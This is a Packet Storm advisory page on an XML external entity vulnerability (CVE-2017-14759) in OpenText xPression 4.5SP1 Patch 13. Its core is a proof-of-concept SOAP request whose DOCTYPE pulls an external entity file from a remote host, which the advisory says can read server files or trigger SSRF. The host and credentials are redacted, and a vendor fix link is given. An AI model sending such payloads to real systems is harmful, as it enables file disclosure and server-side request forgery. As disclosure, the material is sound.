Exploit the possiblities

OpenText Document Sciences xPression 4.5SP1 Patch 13 XML Injection

OpenText Document Sciences xPression 4.5SP1 Patch 13 XML Injection
Posted Sep 29, 2017
Authored by Mariusz Woloszyn

OpenText Document Sciences xPression version 4.5SP1 Patch 13 suffers from an XML external entity injection vulnerability.

tags | exploit
advisories | CVE-2017-14759
MD5 | cc7bbb9dac8735511fb665bdf6292a89

OpenText Document Sciences xPression 4.5SP1 Patch 13 XML Injection

Change Mirror Download
Title: OpenText Document Sciences xPression (formerly EMC Document
Sciences xPression) - XML External Entity
Author: Marcin Woloszyn
Date: 27. September 2017
CVE: CVE-2017-14759

Affected Software:
==================
OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)

Exploit was tested on:
======================
v4.5SP1 Patch 13 (older versions might be affected as well)

XML External Entity:
====================

Application XML parser is accepting DOCTYPE in provided XML documents
either directly or indirectly, using URL.
This can be exploited in various of ways, e.g. to read directory
listings, read system or application files,
cause denial of service or issue requests on behalf of server (SSRF).

Vector :
--------

POST /xFramework/services/QuickDoc.QuickDocHttpSoap11Endpoint/ HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: "urn:publishDocument"
Content-Length: 13689
Host: [...cut...]
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: close

<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:web="http://webservice.framework.xprs.dsc.com">
<soapenv:Header/>
<soapenv:Body>
<web:publishDocument>
<web:requestContext><![CDATA[<!DOCTYPE m [ <!ENTITY % r
SYSTEM "http://[...cut...]/m.xml"> %r; %i; %t; ]><RequestContext>
<Credentials method="UserID and Password">
<UserID>[...cut...]</UserID>
<Password>[...cut...]</Password>
</Credentials>
<ApplicationName>ELease</ApplicationName>
</RequestContext>]]>
</web:requestContext>
<web:documentName>[...cut...]</web:documentName>
<web:customerData>
<![CDATA[
<root xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="C:\xPression\CustomerData\Schema\eLease_v0.3.xsd">
<eLease>
<PrintStatus>Final</PrintStatus>
[...cut...]
</eLease>
</root>
]]> </web:customerData>
<!--Optional:-->
<web:outputProfileName>PDF w Draftwatermark to
File</web:outputProfileName>
</web:publishDocument>
</soapenv:Body>
</soapenv:Envelope>

Fix:
====
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774

Contact:
========
mw[at]nme[dot]pl


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

February 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    15 Files
  • 2
    Feb 2nd
    15 Files
  • 3
    Feb 3rd
    15 Files
  • 4
    Feb 4th
    13 Files
  • 5
    Feb 5th
    16 Files
  • 6
    Feb 6th
    15 Files
  • 7
    Feb 7th
    15 Files
  • 8
    Feb 8th
    15 Files
  • 9
    Feb 9th
    18 Files
  • 10
    Feb 10th
    8 Files
  • 11
    Feb 11th
    8 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    15 Files
  • 14
    Feb 14th
    15 Files
  • 15
    Feb 15th
    17 Files
  • 16
    Feb 16th
    18 Files
  • 17
    Feb 17th
    37 Files
  • 18
    Feb 18th
    2 Files
  • 19
    Feb 19th
    16 Files
  • 20
    Feb 20th
    11 Files
  • 21
    Feb 21st
    3 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close